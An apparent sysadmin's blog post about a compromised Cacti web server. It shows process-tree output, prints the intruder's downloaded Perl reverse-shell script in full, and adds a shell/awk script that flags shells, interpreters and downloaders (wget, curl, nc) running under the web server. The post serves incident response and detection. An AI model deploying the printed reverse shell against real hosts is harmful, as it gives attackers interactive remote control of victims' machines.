Cacti gets hacked

I noticed a www process spinning away on bean:

root@bean~$ptree 15591
405 /usr/local/apache2/bin/httpsd -k start
438 /usr/local/apache2/bin/httpsd -k start
15591 sh -c wget;mv ping.txt temp2006;perl temp2006 203.11
14402 perl temp2006 3303

and then after looking at the code

root@bean~$more ping.txt
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
open(STDIN, ">&SOCKET");
system("id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i");

noticed that it looked like a known hack attempt as documented here. So for the time being I’ve disabled web access until I can re-install a web zone.
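
The tell in the ptree output above is a shell and a perl interpreter hanging off the web server. The following check for that pattern is an added example, not part of the original post: the function names and the sample listing are constructed, and the PPID column is an assumption inferred from the chain ptree printed.

```shell
#!/bin/sh
# Flag shells, interpreters and download tools that descend from the web server.
# Reads "PID PPID ARGS" lines on stdin (e.g. from: ps -e -o pid,ppid,args).
# $1 is a regex for the server command; the default is an assumption that
# covers the httpsd binary shown in the post.
flag_web_descendants() {
    awk -v web="${1:-httpsd|httpd}" '
    BEGIN { susp = "(^|[ /;])(sh|bash|perl|python|wget|curl|nc)( |;|$)" }
    $1 ~ /^[0-9]+$/ {                      # skip the header line
        pid = $1; ppid[pid] = $2
        cmd = $0
        sub(/^[ \t]*[0-9]+[ \t]+[0-9]+[ \t]+/, "", cmd)
        args[pid] = cmd
        order[++n] = pid
    }
    END {
        for (i = 1; i <= n; i++) {
            pid = order[i]
            if (args[pid] ~ web) continue      # the server itself
            if (args[pid] !~ susp) continue    # not a shell/interpreter/downloader
            p = ppid[pid]; hops = 0
            # Walk up the parent chain (bounded) looking for the web server.
            while ((p in args) && hops++ < 64) {
                if (args[p] ~ web) { print pid "\t" args[pid]; break }
                p = ppid[p]
            }
        }
    }'
}

# Constructed sample: the four processes from the post plus an unrelated
# ssh login shell that must not be flagged.
sample_ps() {
    cat <<'EOF'
  PID  PPID COMMAND
  405     1 /usr/local/apache2/bin/httpsd -k start
  438   405 /usr/local/apache2/bin/httpsd -k start
15591   438 sh -c wget;mv ping.txt temp2006;perl temp2006 203.11
14402 15591 perl temp2006 3303
  612     1 /usr/lib/ssh/sshd
  977   612 /usr/bin/bash
EOF
}

sample_ps | flag_web_descendants 'httpsd'
```

On a live host, feed it `ps -e -o pid,ppid,args` instead of the sample. A web application that legitimately shells out (Cacti's pollers do) will need its known commands excluded from the output.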